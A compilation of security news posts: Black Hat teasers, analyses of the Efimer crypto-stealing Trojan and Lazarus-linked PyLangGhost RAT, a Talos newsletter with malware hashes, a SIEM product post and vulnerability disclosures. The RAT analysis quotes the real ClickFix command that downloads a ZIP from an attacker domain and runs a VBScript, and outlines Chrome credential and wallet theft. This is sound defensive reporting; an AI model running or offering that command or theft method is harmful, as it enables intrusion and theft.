    Black Hat USA 2025: Is a high cyber insurance premium about your risk, or your insurer’s?

    A sky-high premium may not always reflect your company’s security posture

    WeLiveSecurity – ​Read More

    Black Hat USA 2025: Policy compliance and the myth of the silver bullet

    Who’s to blame when the AI tool managing a company’s compliance status gets it wrong?

    WeLiveSecurity – ​Read More

    The Efimer Trojan steals cryptocurrency via malicious torrent files and WordPress websites | Kaspersky official blog

    If you’re an active cryptocurrency user but you’re still downloading torrent files and aren’t sure how to safely store your seed phrases, we’ve some bad news for you. We’ve discovered a new Trojan, Efimer, that replaces crypto wallet addresses right in your clipboard. One click is all it takes for your money to end up in a hacker’s wallet.

    Here’s what you need to do to keep your crypto safe.

    How Efimer spreads

    One of Efimer’s main distribution channels is WordPress websites. It doesn’t help that WordPress is a free content-management system for websites — or that it’s the world’s most popular. Everyone from small-time bloggers and businesses to major media outlets and corporations uses it. Scammers exploit poorly secured sites and publish posts with infected torrent files.

    This is what a hacked WordPress website infected with Efimer looks like

    This is what a hacked WordPress website infected with Efimer looks like

    When a user downloads a torrent file from an infected site, they get a small folder that contains what looks like a movie file with the .xmpeg extension. You can’t open a file in that format without a “special media player”, which is conveniently included in the folder. In reality, the “player” is a Trojan installer.

    The torrent folder with the malicious files inside

    The torrent folder with the malicious files inside

    Recently, Efimer has also started spreading through phishing emails. Website and domain owners receive emails, purportedly from lawyers, falsely claiming copyright infringement and demanding content removal. The emails say all the details are in the attachment… which is actually where the Trojan is lurking. Even if you don’t own a website yourself, you can still receive spam email messages with Efimer attached. Threat actors collect user email addresses from WordPress sites they’ve previously compromised. So, if you get an email like this, whatever you — don’t open the attachment.

    How Efimer steals your crypto

    Once Efimer infects a device, one of its scripts adds itself to the Windows Defender exclusion list — provided the user has administrator privileges. The malware then installs a Tor client to communicate with its command-and-control server.

    Efimer accesses the clipboard and searches for a seed phrase, which is a unique sequence of words that allows access to a crypto wallet. The Trojan saves this phrase and sends it to the attackers’ server. If it also finds a crypto wallet address in the clipboard, Efimer discreetly swaps it out for a fake one. To avoid raising suspicion, the fake address is often very similar to the original. The end result is that cryptocurrency is silently transferred to the cybercrooks.

    Wallets containing Bitcoin, Ethereum, Monero, Tron, or Solana are primarily at risk, but owners of other cryptocurrencies shouldn’t let their guard down. The developers of Efimer regularly update the malware by adding new scripts and extending support for more crypto wallets. You can find out more about Efimer’s capabilities in our analysis on Securelist.

    Who’s at risk?

    The Trojan is attacking Windows users all over the world. Currently the malware is most active in Brazil, Russia, India, Spain, Germany, and Italy, but the scope of these attacks could easily expand to your country, if it’s not already on the list. Users of crypto wallets, owners of WordPress sites, and those who frequently download movies, games, and torrent files from the internet should be especially vigilant.

    How to protect yourself from Efimer

    The Efimer Trojan is a real jack-of-all-trades. It’s capable of stealing cryptocurrencies, swapping crypto wallets, and it poses a serious threat to both individuals and organizations. It can use scripts to hack WordPress sites, and is able to spread on its own. However, in every case, a device can only be infected if the potential victim downloads and opens a malicious file themselves. This means that a little vigilance and a healthy dose of caution — ignoring files from suspicious sources at the very least — is your best defense against Efimer.

    Here are our recommendations for home users:

    • Use a robust security solution that can scan files for malware and warn you against opening phishing links.
    • Create unique and strong passwords. And no, storing them in your notes app is not a good idea. Make sure you use a password manager.
    • Use two-factor authentication to sign in to crypto wallets and websites.
    • Avoid downloading movies or games from unverified sites. Pirated content is often crawling with all kinds of Trojans. Even if you choose to take that risk, pay close attention to the file extensions. A regular video file definitely won’t have an .exe or .xmpeg extension.
    • Don’t store your seed phrases in plain text files. Trust a password manager. Read this article to learn more about how to protect your cryptocurrency assets.

    What other threats lurk in the crypto world:

    Kaspersky official blog – ​Read More

    AI wrote my code and all I got was this broken prototype

    AI wrote my code and all I got was this broken prototype

    Welcome to this week’s edition of the Threat Source newsletter. 

    Vulnerabilities within software are a persistent challenge. Software engineers inadvertently tend to make the same mistakes repeatedly, with the same entries appearing in the annual top 25 list of Common Weakness Enumerations each year. 

    The truth is, writing software is difficult. Software engineering is a craft demands concentration, knowledge and time, all coupled with extensive testing. Even the most skilled software engineer can get distracted or have a bad day, leading to a hidden vulnerability inadvertently making its way into a production codebase. 

    Identifying vulnerabilities early in the software development process is one of the promises of AI. The idea being that an AI agent would write perfect code under the direction of a software engineer or verify and correct code written by a human. 

    Last weekend, I decided to put this premise to the test. As a somewhat rusty software engineer, I resolved to see if AI could assist me with a personal software project. Initially, I was impressed, the AI agent offered an engaging discussion about high-level architecture and the trade-offs of various approaches. I was amazed at the lines of code that the AI generated on request. All the software for my project written at the press of a button! 

    Then came the testing. Although the code looked convincing, it failed to interface with the required libraries. Parameters were incorrect, it tried to call fictional functions. It seemed that the way the AI imagined the library to work didn’t reflect reality or the available documentation. Similarly, there were less sanity checks or verification of variable values than I was comfortable with; especially since many of these were derived from external inputs. 

    To be fair, the AI code resolved a tricky threading issue that had defeated me, and the ‘boilerplate’ code necessary to form the skeleton structure of the software was flawless. I felt that I achieved a productivity boost from the AI’s exposure to ‘frequently encountered’ coding issues. However, when it came to more esoteric APIs with which I was moderately familiar, the AI was unable to generate functional code or correctly diagnose reported errors. 

    After some debugging and manual rewriting, I managed to create a working prototype. The code is clearly not bulletproof, but then again, I hadn’t explicitly asked for code that was secured against all potential hacks. Like many software engineers, myself and my AI assistant focused on quickly delivering the desired functionality, rather than considering the long-term operation of the code in a potentially hostile environment. 

    I remain optimistic that AI assisted coding is the pathway to a software vulnerability free future. However, my recent limited personal experience leads me to think that we still have a considerable journey ahead before we can definitively resolve software vulnerabilities for good. 

    I hope you all have a tremendous time at Summer Camp, see a lot of old friends and make new ones and most importantly that you shower and use deodorant. Conference season is a marathon, it’s long, it’s arduous, it’s sweaty – be the hygienic change you want to see in the world.  

    The one big thing 

    Continuing the AI theme, Guilherme describes how AI LLM models can be used to assist in the reverse engineering of malware. Used correctly, LLMs can provide valuable insights and facilitate the analysis of malware. 

    Why do I care? 

    Reverse engineering malware is the often time-consuming task of identifying the execution path of malicious software. Frequently malware writers obfuscate their code to make it difficult to understand and follow what their code is doing. Advances in technology that can speed up this process make fighting malware easier.  

    So now what? 

    Investigate if the tools and approaches described in the blog can be used to improve your reverse engineering process, or as a means to begin learning about reverse engineering. 

    Top security headlines of the week 

    As ransomware gangs threaten physical harm, ‘I am afraid of what’s next,’ ex-negotiator says

    In an effort to increase the pressure on victims, ransomware gangs are now using threats of physical violence. (The Register)

    ‘Shadow AI’ increases cost of data breaches, report finds

    Unmanaged and unsecured use of AI is leading to data breaches. (Cybersecurity Dive)

    Enough to drive a cybersecurity officer mad: one rule here, a different rule there

    Chief information security officers call for less fragmentation in global cybersecurity regulations. (ASPI)

    UK Online Safety Act promotes insecurity

    The implementation of the UK Online Safety Act requiring age verification for content deemed harmful to children introduces some security quandaries. (Tech HQ)

    Can’t get enough Talos? 

    Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analyst

    A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages). Watch here.

    Tales from the Frontlines

    Join the Cisco Talos Incident Response team to hear real-world stories from the frontlines of cyber defense. Reserve your spot.

    Vulnerability roundup

    Cisco Talos’ Vulnerability Discovery & Research team recently disclosed seven vulnerabilities in WWBN AVideo, four in MedDream, and one in an Eclipse ThreadX module. Read more.

    Talos Takes

    Hazel is joined by threat intelligence researcher James Nutland to discuss Cisco Talos’ latest findings on the newly emerged Chaos ransomware group. Listen here.

    Upcoming events where you can find Talos 

    It’s the summer. We’ll be on the beach. 

    Most prevalent malware files from Talos telemetry over the past week  

    SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
    MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
    VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
    Typical Filename: VID001.exe 
    Claimed Product: N/A 
    Detection Name: Win.Worm.Coinminer::1201  

    SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
    MD5: 7bdbd180c081fa63ca94f9c22c457376  
    VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details  
    Typical Filename: IMG001.exe   
    Detection Name: Simple_Custom_Detection 

    SHA 256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610 
    MD5: 85bbddc502f7b10871621fd460243fbc  
    VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details 
    Typical Filename: N/A 
    Claimed Product: Self-extracting archive 
    Detection Name: Win.Worm.Bitmin-9847045-0 

    SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
    MD5: 71fea034b422e4a17ebb06022532fdde   
    VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details  
    Typical Filename: VID001.exe   
    Claimed Product: N/A   
    Detection Name: Coinminer:MBT.26mw.in14.Talos  

    SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa  
    MD5: df11b3105df8d7c70e7b501e210e3cc3  
    VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details  
    Typical Filename: DOC001.exe  
    Claimed Product: N/A  
    Detection Name: Win.Worm.Coinminer::1201 

    Cisco Talos Blog – ​Read More

    UEBA rules in Kaspersky SIEM | Kaspersky official blog

    Today’s cyberattackers are masters of disguise — working hard to make their malicious activities look like normal processes. They use legitimate tools, communicate with command-and-control servers through public services, and mask the launch of malicious code as regular user actions. This kind of activity is almost invisible to traditional security solutions; however, certain anomalies can be uncovered by analyzing the behavior of specific users, service accounts, or other entities. This is the core concept behind a threat detection method called UEBA, short for “user and entity behavior analytics”. And this is exactly what we’ve implemented in the latest version of our SIEM system — Kaspersky Unified Monitoring and Analysis Platform.

    How UEBA works within an SIEM system

    By definition, UEBA is a cybersecurity technology that identifies threats by analyzing the behavior of users, devices, applications, and other objects in an information system. While in principle this technology can be used with any security solution, we believe it’s most effective when integrated in an SIEM platform. By using machine learning to establish a normal baseline for a user or object’s behavior (whether it’s a computer, service, or another entity), an SIEM system equipped with UEBA detection rules can analyze deviations from typical behavior. This allows for the timely detection of APTs, targeted attacks, and insider threats.

    This is why we’ve equipped our SIEM system with an UEBA rule package — designed specifically to detect anomalies in authentication processes, network activity, and the execution of processes on Windows-based workstations and servers. This makes our system smarter at finding novel attacks that are difficult to spot with regular correlation rules, signatures, or indicators of compromise. Every rule in the UEBA package is based on profiling the behavior of users and objects. The rules fall into two main categories:

    • Statistical rules, which use the interquartile range to identify anomalies based on current behavior data.
    • Rules that detect deviations from normal behavior, which is determined by analyzing an account or object’s past activity.

    When a deviation from a historical norm or statistical expectation is found, the system generates an alert and increases the risk score of the relevant object (user or host). (Read this article to learn more about how our SIEM solution uses AI for risk scoring.)

    Structure of the UEBA rule package

    For this rule package, we focused on the areas where UEBA technology works best — such as account protection, network activity monitoring, and secure authentication. Our UEBA rule package currently features the following sections:

    Authentication and permission control

    These rules detect unusual login methods, sudden spikes in authentication errors, accounts being added to local groups on different computers, and authentication attempts outside normal business hours. Each of these deviations is flagged, and increases the user’s risk score.

    DNS profiling

    Dedicated to analysis of DNS queries made by computers on the corporate network. The rules in this section collect historical data to identify anomalies like queries for unknown record types, excessively long domain names, unusual zones, or atypical query frequencies. It also monitors the volume of data returned via DNS. Any such deviations are considered potential threats, and thus increase the host’s risk score.

    Network activity profiling

    Tracking connections between computers both within the network and to external resources. These rules flag first-time connections to new ports, contacts with previously unknown hosts, unusual volumes of outgoing traffic, and access to management services. All actions that deviate from normal behavior generate alerts and raise the risk score.

    Process profiling

    This section monitors programs launched from Windows system folders. If a new executable runs for the first time from the System32 or SysWOW64 directories on a specific computer, it’s flagged as an anomaly. This raises the risk score for the user who initiated the process.

    PowerShell profiling

    This section tracks the source of PowerShell script executions. If a script runs for the first time from a non-standard directory — one that isn’t Program Files, Windows, or another common location — the action is marked as suspicious and increases the user’s risk score.

    VPN monitoring

    This flags a variety of events as risky — including logins from countries not previously associated with the user’s profile, geographically impossible travel, unusual traffic volumes over a VPN, VPN client changes, and multiple failed login attempts. Each of these events results in a higher risk score for the user’s account.

    Using these UEBA rules helps us detect sophisticated attacks and reduce false positives by analyzing behavioral context. This significantly improves the accuracy of our analysis and lowers the workload of security analysts. Using UEBA and AI to assign a risk score to an object speeds up and improves each analyst’s response time by allowing them to prioritize incidents more accurately. Combined with the automatic creation of typical behavioral baselines, this significantly boosts the overall efficiency of security teams. It frees them from routine tasks, and provides richer, more accurate behavioral context for threat detection and response.

    We’re constantly improving the usability of our SIEM system. Stay tuned for updates to the Kaspersky Unified Monitoring and Analysis Platform on its official product page.

    Kaspersky official blog – ​Read More

    WWBN, MedDream, Eclipse vulnerabilities

    WWBN, MedDream, Eclipse vulnerabilities

    Cisco Talos’ Vulnerability Discovery & Research team recently disclosed seven vulnerabilities in WWBN AVideo, four in MedDream, and one in an Eclipse ThreadX module.

    The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

    For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

    WWBN XSS, race condition, incomplete blacklist vulnerabilities

    Discovered by Claudio Bozzato of Cisco Talos.

    WWBN AVideo is a video streaming platform with hosting, management, and video monetization features.

    Talos found five cross-site scripting (XSS) vulnerabilities in WWBN AVideo 14.4 and dev master commit 8a8954ff:

    A specially crafted HTTP request can lead to arbitrary Javascript execution in all five cases. An attacker must get a user to visit a webpage to trigger these vulnerabilities.

    Additionally, Talos identified two vulnerabilities that, when chained together, can lead to arbitrary code execution:

    TALOS-2025-2212 (CVE-2025-25214) A race condition vulnerability exists in the aVideoEncoder.json.php unzip functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A series of specially crafted HTTP requests can lead to arbitrary code execution.

    TALOS-2025-2213 (CVE-2025-48732) An incomplete blacklist exists in the .htaccess sample of WWBN AVideo 14.4 and dev master commit 8a8954ff. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can request a .phar file to trigger this vulnerability.

    MedDream

    Discovered by Emmanuel Tacheau and Marcin Noga of Cisco Talos.

    MedDream PACS Premium is a DICOM 3.0 compliant picture archiving and communication system for the medical industry. The PACS server provides connectivity to all DICOM modalities (CR, DX, CT, MR, US, XA, etc.).

    Talos found four unique MedDreams PACS Premium vulnerabilities.

    TALOS-2025-2154 (CVE-2025-26469) is an incorrect default permissions vulnerability in the CServerSettings::SetRegistryValues functionality of MedDream PACS Premium 7.3.3.840. A specially crafted application can decrypt credentials stored in a configuration-related registry key. An attacker can execute a malicious script or application to exploit this vulnerability.

    TALOS-2025-2156 (CVE-2025-27724) is a privilege escalation vulnerability in the login.php functionality of meddream MedDream PACS Premium 7.3.3.840. A specially crafted .php file can lead to elevated capabilities. An attacker can upload a malicious file to trigger this vulnerability.

    TALOS-2025-2176 (CVE-2025-32731) is a reflected XSS vulnerability in the radiationDoseReport.php functionality of meddream MedDream PACS Premium 7.3.5.860. A specially crafted malicious URL can lead to arbitrary JavaScript code execution. An attacker can provide a crafted URL to trigger this vulnerability.

    TALOS-2025-2177 (CVE-2025-24485) is a server-side request forgery (SSRF) vulnerability in the cecho.php functionality of MedDream PACS Premium 7.3.5.860. A specially crafted HTTP request can lead to SSRF. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.

    Eclipse ThreadX FileX integer underflow vulnerability

    Discovered by Kelly Patterson of Cisco Talos.

    Eclipse ThreadX is an embedded development suite for an advanced real-time operating system (RTOS) that provides efficient performance for resource-constrained devices. 

    TALOS-2024-2088 is a buffer overflow vulnerability in the FileX RAM disk driver functionality of Eclipse ThreadX FileX git commit 1b85eb2. A specially crafted set of network packets can lead to code execution. An attacker can send a sequence of requests to trigger this vulnerability.

    Cisco Talos Blog – ​Read More

    PyLangGhost RAT: Rising Data Stealer from Lazarus Group Targeting Finance and Technology 

    Editor’s note: The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can find Mauro on X. 

    North Korean state-sponsored groups, such as Lazarus, continue to target the financial and cryptocurrency sectors with a variety of custom malware families. In previous research, we examined strains like InvisibleFerret, Beavertail, and OtterCookie, often deployed through fake developer job interviews or staged business calls with executives. While these have been the usual suspects, a newer Lazarus subgroup, Famous Chollima, has recently introduced a fresh threat: PyLangGhost RAT, a Python-based evolution of GoLangGhostRAT. 

    Unlike common malware that spreads through pirated software or infected USB drives, PyLangGhost RAT is delivered via highly targeted social engineering campaigns aimed at the technology, finance, and crypto industries, with developers and executives as prime victims. In these attacks, adversaries stage fake job interviews and trick their targets into believing that their browser is blocking access to the camera or microphone. The “solution” they offer is to run a script that supposedly grants permission. In reality, the script hands over full remote access to a North Korean operator. 

    This sample was obtained from fellow researcher Heiner García Pérez of BlockOSINT, who encountered it during a fake job recruitment attempt and documented his findings in an advisory.  

    Let’s break it down. 

    A fake interview process. Source: BlockOSINT

    Key Takeaways 

    • Attribution: PyLangGhost RAT is linked to the North Korean Lazarus subgroup Famous Chollima, known for using highly targeted and creative intrusion methods. 
    • Delivery Method: Distributed through “ClickFix” social engineering, where victims are tricked into running malicious commands to supposedly fix a fake camera or microphone error during staged job interviews. 
    • Core Components: The malware’s main loader (nvidia.py) relies on multiple modules (config.py, api.py, command.py, util.py, auto.py) for persistence, C2 communication, command execution, data compression, and credential theft. 
    • Credential & Wallet Theft: Targets browser-stored credentials and cryptocurrency wallet data from extensions like MetaMask, BitKeep, Coinbase Wallet, and Phantom, using privilege escalation and Chrome encryption key decryption (including bypasses for Chrome v20+). 
    • C2 Communication: Communicates over raw IP addresses with no TLS, using weak RC4/MD5 encryption, but remains stealthy with very low initial detection rates (0–3 detections on VirusTotal). 
    • Code Origin: Appears to be a full Python reimplementation of GoLangGhost RAT, likely aided by AI, as indicated by Go-like logic patterns, unusual code structure, and large commented-out sections. 

    The Fake Job Offer Trap 

    In the past, DPRK operators have resorted to creative methods to distribute malware, from staging fake job interviews and sharing bogus coding challenges (some laced with malware, others seemingly clean but invoking malicious dependencies at runtime), to posing as VCs in business calls, pretending not to hear the victim, and prompting them to download a fake Zoom fix or update. 

    This case is a bit different. It falls into a newer category of attacks called “ClickFix” — scenarios where the attacker, or one of their websites, presents the victim with fake CAPTCHAs or error messages that prevent them from completing an interview or coding challenge. The proposed fix is deceptively simple: copy a command shown on the website and paste it into a terminal or the Windows Run window (Win + R) to “solve the issue.” By doing so, users end up executing malicious scripts with their own privileges, or even worse, as Administrator, essentially handing control of the system to a Chollima operator. 

    A fake “Race Condition” Error, prompting the user to run a command. Source: BlockOSINT

    In this case, the researcher received a fake job offer to work at the Aave DeFi Protocol. After a brief screening with a few generic questions, he was redirected to a page that began flooding him with notifications about an error dubbed “Race Condition in Windows Camera Discovery Cache.” 

    Luckily, the website offered a quick fix for this “problem”: just run a small code snippet in the terminal. 

    But what does this code actually do? Let’s find out. 

    Chollimas & Pythons 

    Let’s analyze the command: 

    curl -k -o “%TEMP%nvidiaRelease.zip” https://360scanner.store/cam-v-b74si.fix && powershell -Command “Expand-Archive -Force -Path ‘%TEMP%nvidiaRelease.zip’ 

    -DestinationPath ‘%TEMP%nvidiaRelease’” && wscript “%TEMP% 

    nvidiaReleaseupdate.vbs” 

    This line: 

    • Downloads a ZIP file from 360scanner[.]store using curl. 
    • Extracts it to the %TEMP%nvidiaRelease directory using PowerShell’s Expand- Archive. 
    • Executes a VBScript named update.vbs via wscript. 
    update.vbs contents

    Now let’s look at what this script actually does:

    Inside update.vbs 

    It silently decompresses Lib.zip to the same directory, using tar, and waits for the extraction to finish, hiding any windows during the process. 

    Then, it runs csshost.exe nvidia.py. The filename csshost.exe is mildly obfuscated by being split in two parts (“css” & “host.exe”) before execution. 

    Disguised Python Environment 

    But what is csshost.exe? 

    It’s actually a renamed python.exe binary. Nothing more. No packing, no exotic tricks; just Python, rebranded. 

    The Lib.zip file is a clean Python environment bundled with standard libraries, containing nothing malicious or unusual. 

    Lib.zip contents, clean

    A Decoy and Its Real Payload 

    Funny enough, if you try to download the same file manually with a different User- Agent, the server returns a legitimate driver instead — a clever decoy tactic. 

    On the other hand, nvidia.py imports three additional components: api.py, config.py, and command.py. The last one, in turn, also uses util.py and auto.py.  

    Core Modules and Their Roles 

    Let’s break down the 3 modules, starting with config.py. 

    This file defines a set of constants used throughout the malware lifecycle, including message types, command codes, and operational parameters. 

    Here’s a quick reference of the command dictionary defined in config.py: 

    Code Function
    qwer  Get system information 
    asdf  Upload a file 
    zxcv  Download a file 
    vbcx  Open a terminal session 
    qalp  Detach terminal (background) 
    ghd  Wait 
    89io  Gather Chrome extension data 
    gi%#  Exfiltrate Chrome cookie store 
    kyci  Exfiltrate Chrome keychain 
    dghh  Exit the implant 
    Command dictionary on config.py

    Immediately after that, a C2 server based in the United Kingdom is declared (some sources indicate “Private Client – Iran”), along with a registry key used for persistence, and a list of Chrome extensions targeted for exfiltration, including MetaMask, BitKeep, Coinbase Wallet, and Phantom. 

    Extensions list, C2 server and persistence key

    Coming up next, api.py manages communication with the C2 server we just saw on config.py. There are three main functions: 

    1. Packet0623make, which resorts to RC4 cipher to encrypt data in transmission, builds a packet and computes a checksum. RC4 is obsolete and weak but simple, which may explain why that choice. 
    1. Packet0623decode, which validates the checksum and decrypts the packet. 
    1. Htxp0623Exchange, which simply posts the packet to the server without TLS encryption, thus making the RC4 and MD5 cocktail an even weaker choice. 
    Package building using RC4

    Now command.py acts as a dispatcher, interpreting both malware logic and C2 communications, and executing instructions accordingly. It also handles status messages defined in the config.py module we examined earlier. 

    The key functions are: 

    Function  Description 
    ProcessInfo  Collects the current user, hostname, OS, architecture, and the malware (daemon) version.  
    ProcessUpload  Allows the attacker to upload compressed files to the victim’s machine. 
    ProcessDownload  Stages files or folders for exfiltration. If the target is a folder, it gets compressed before transmission. 
    ProcessTerminal  Opens a reverse shell or executes arbitrary commands, depending on the mode selected. 
    makeMsg0623 / decodeMsg0623  Serialize and deserialize base64-encoded messages exchanged between implant and C2. 
    ProcessAuto:  Triggers automation routines from the auto.py module 
    Function to open a reverse shell or run arbitrary commands

    You probably remember that command.py imports two other custom modules: util.py and auto.py. Let’s review them as well. 

    Module util.py implements three functions: 

    Function  Description 
    com0715press  Compresses files in-memory as .tar.gz  
    decom0715press  Extracts .tar.gz files from memory to disk 
    valid0715relPath  Validates routes to prevent path transversal 
    Auxiliary functions from util.py

    Finally, the last and most critical module: auto.py

    This module implements two key functions: 

    • AutoGatherMode: Collects configuration data from cryptocurrency browser extensions such as MetaMask, BitKeep, Coinbase Wallet, and Phantom. 
    • AutoCookieMode: Extracts login artifacts, including credentials and cookies, from Google Chrome. 

    The autoGatherMode function searches for the user’s Google Chrome profile directory (AppDataLocalGoogleChromeUser Data), starting with the Default profile and then enumerating others. It compresses the configuration directories of the targeted extensions into a single archive named gather.tar.gz and exfiltrates it for manual analysis, with the goal of enabling account takeover or compromising cryptocurrency wallets. 

    Exfiltrating Google Chrome Profiles in a compressed file

    With the rise of information-stealing malware, browser vendors have introduced various countermeasures to protect sensitive data such as password managers, cookies, and encrypted storage vaults. Chrome is no exception. To bypass these protections, the malware includes functions designed to check whether the user has administrative privileges and to retrieve Chrome’s encryption key through different methods, depending on the browser version, as the protection mechanisms vary. 

    The autoCookieMode function, on the other hand, starts by checking if the user has administrative privileges. If not, it relaunches itself using runas, triggering a UAC (User Access Control) prompt. The prompt is intentionally deceptive, it simply displays “python.exe” as the requesting binary, providing no additional context or visual indicators. This subtle form of social engineering increases the likelihood of the user granting permission. 

    If the prompt is accepted, the malware gains elevated privileges, which are necessary to interact with privileged APIs such as the Data Protection API (DPAPI) used to retrieve Chrome’s encryption keys. If the user declines, the malware continues execution with the current user’s privileges. 

    Malicious UAC prompt

    It then creates a file named chrome_logins_dump.txt to store the extracted credentials. To do so, it accesses Chrome’s Local State file, which contains either an encrypted_key (in v10) or an app_bound_encrypted_key (in v20+). These keys are not stored in plaintext but encoded in Base64 and encrypted using Windows DPAPI. While they are accessible to the current user, they require decryption before use. 

    Google Chrome Keys Harvesting

    In Chrome v10, the encryption key is protected solely by the user’s DPAPI context and can be decrypted directly. In Chrome v20 and later, the key is app-bound and encrypted twice — first with the machine’s DPAPI context, and then again with the user’s. To bypass this layered protection, the malware impersonates the lsass.exe process to temporarily gain SYSTEM privileges. 

    Impersonating lsass.exe

    It then applies both layers of decryption, yielding a key blob which, once parsed, reveals the AES master key used to decrypt Chrome’s stored credentials. 

    Once the key is obtained by either method, the malware connects to the Login Data SQLite database and extracts all stored credentials, applying the corresponding decryption logic for v10 or v20 entries depending on the case. 

    Credentials dumped by the process

    At this point, it’s game over for the victim. 

    With the module functionality now understood, the next step is to examine the malware’s core component: nvidia.py. Before diving in, here’s a summary of the auxiliary functions contained in this module. 

    • check_adminRole: Checks if the current process has administrative privileges using IsUserAnAdmin(). 
    • GetSecretKey: Extracts and decrypts the AES key used by Chrome (v10) from the Local State file using DPAPI. 
    • DecryPayload: Decrypts a payload using a given cipher. 
    • GenCipher: Constructs an AES-GCM cipher object using a given key and IV. 
    • DecryPwd: Decrypts v10-style Chrome passwords using AES-GCM and the secret key obtained via DPAPI. 
    • impersonate_lsass: Context manager that impersonates the lsass.exe process to gain SYSTEM privileges. 
    • parse_key_blob: Parses Chrome’s v20 encrypted key blob structure to extract the IV, ciphertext, tag, and (if present) encrypted AES key. 
    • decrypt_with_cng: Decrypts data using the Windows CNG API and a hardcoded key name (“Google Chromekey1”). 
    • byte_xor: Performs XOR between two byte arrays (used to unmask AES key in v20 key blobs). 
    • derive_v20_master_key: Decrypts and derives the AES master key from parsed v20 Chrome blobs, supporting multiple encryption flags (AES, ChaCha20, masked AES). 

    From Recon to Full Control 

    Now, to the core component: nvidia.py

    This module begins by registering a registry key to establish persistence, assigning a unique identifier (UUID) to the host, and creating a pseudo–mutex-like mechanism via a .store file to prevent multiple instances from running simultaneously. It then enters a loop, continuously listening for new instructions from the C2 server. Additionally, it supports standalone execution with specific command-line arguments, enabling it to immediately perform actions such as stealing cookies or login data. 

    Analysis in ANY.RUN shows that all communication with the C2 servers is carried out over raw IP addresses, with no domain names used. While the traffic is not encrypted with TLS, it is at least obfuscated using RC4; a weak method, but still an added layer of concealment. 

    View real case inside ANY.RUN sandbox 

    Traffic to the C2 Server

    The sandbox quickly flags the traffic as suspicious. Because the malware uses the default python-requests User-Agent and sends multiple rapid requests, this pattern becomes a reliable detection indicator. 

    Detect threats faster with ANY.RUN’s Interactive Sandbox
    See full attack chain in seconds for immediate response 



    Get started with business email


    Traffic is automatically marked as suspicious

    Another key observation: most of the malware artifacts used in this campaign register only 0 to 3 detections on VirusTotal, making them particularly stealthy. Fortunately, ANY.RUN immediately identifies these samples as 100/100 malicious, starting with the initial update.vbs loader. 

    update.vbs loader marked as malicious

    Other components, including nvidia.py, the main launcher, are also flagged instantly with a 100/100 score, providing early warning against this evolving threat. 

    nvidia.py loader marked as malicious

    New malware, you say? Let’s take a closer look. 

    Gophers, Ghosts & AI 

    A variant of this sample was recently observed by other security laboratories, which noted strong similarities to GoLangGhost RAT. In fact, this appears to be a full reimplementation of that RAT in Python, but with a notable twist. 

    Analysis revealed numerous linguistic patterns and unusual coding constructions, including dead code, large commented-out sections, and Go-style logic structures, suggesting that the port from Go to Python was at least partially assisted by AI tools. 

    Ghosts, Gophers, Pythons, and AI, all converging in a single malware family.  

    Let’s go to the ATT&CK Matrix now, which ANY RUN does automatically. 

    PylangGhost RAT ATT&CK Details 

    PylangGhost RAT shares several tactics, techniques, and procedures (TTPs) with its related families, OtterCookieInvisibleFerret, and BeaverTail but also introduces some new ones: 

    T1036  Masquerading  Renames legitimate binaries such as python.exe to csshost.exe. 
    T1059  Command and Scripting Interpreter  Initiates execution by using wscript.exe to run update.vbs and csshost.exe to launch the nvidia.py loader. 
    T1083  Files and Directory Discovery  Enumerates user profiles and browser extensions. 
    T1012  Query Registry  Gains persistence via registry entries created by the update.vbs script. 
    MITRE ATT&CK Matrix

    Business Impact of PyLangGhost RAT 

    PyLangGhost RAT poses a significant risk to organizations in the technology, finance, and cryptocurrency sectors, with potential consequences including: 

    • Financial losses: Compromised cryptocurrency wallets and stolen credentials can lead directly to asset theft and fraudulent transactions. 
    • Data breaches: Exfiltration of sensitive corporate data, browser-stored credentials, and internal documents can expose intellectual property, customer information, and strategic plans. 
    • Operational disruption: Persistent remote access allows attackers to move laterally, deploy additional payloads, and disrupt business-critical systems. 
    • Reputational damage: Public disclosure of a breach tied to a high-profile state-sponsored group can undermine client trust and brand credibility. 
    • Regulatory consequences: Data theft incidents may trigger compliance violations (e.g., GDPR, CCPA, financial regulations) resulting in legal penalties and reporting obligations. 

    Given its low detection rate and targeted social engineering approach, PyLangGhost RAT enables attackers to operate inside a network for extended periods before discovery, increasing both the scope and cost of an incident. 

    How to Fight Against PyLangGhost RAT 

    Defending against PyLangGhost RAT requires a combination of proactive detection, security awareness, and layered defenses: 

    • Use behavior-based analysis: Solutions like ANY.RUN’s Interactive Sandbox can detect PyLangGhost RAT in minutes by exposing its execution chain, raw IP C2 connections, and credential theft activity. 
    • Validate unexpected commands: Educate employees to never run commands or scripts provided during job interviews or online “technical tests” without verification from security teams. 
    • Restrict administrative privileges: Limit the ability for standard users to run processes with elevated rights, reducing the malware’s ability to retrieve encrypted browser keys. 
